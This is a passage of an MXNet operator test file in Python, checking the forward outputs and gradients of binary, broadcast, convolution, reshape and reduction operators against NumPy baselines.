[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data with ndim between 1 and 5 and each shape dim between 1 and 5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
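# reduce_op sums the full-shape gradient over the axes that were broadcast so
# it can be compared against the gradient of the (possibly smaller) operand.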
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
o = y.forward(is_train=True)
y.backward([mx.nd.array(out, dtype=o[0].dtype)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy compute '%' in double precision, so to avoid numerical
# mismatches we cast to double as well. This test was flaky with float32
# (seeds 1688524483, 1768433044).
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
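# Shift y entirely outside the range of x by more than 2*delta, so the +/- delta
# perturbations used by check_numeric_gradient cannot cross the y=x boundary.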
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy compute '%' in double precision, so to avoid numerical
# mismatches we cast to double as well. This test was flaky with float32
# (seeds 1688524483, 1768433044).
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net._bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
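# A unit impulse convolved with an all-ones kernel reproduces the (dilated)
# kernel footprint, so both the output and the input gradient should sum to
# prod(kernel_shape).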
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net._bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net._simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data with ndim between 1 and 5 and each shape dim between 1 and 5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
# check forward
assert_almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, rtol=1e-4, atol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
# check backward
assert_almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, rtol=1e-4, atol=1e-4)
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data with ndim between 1 and 5 and each shape dim between 1 and 5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
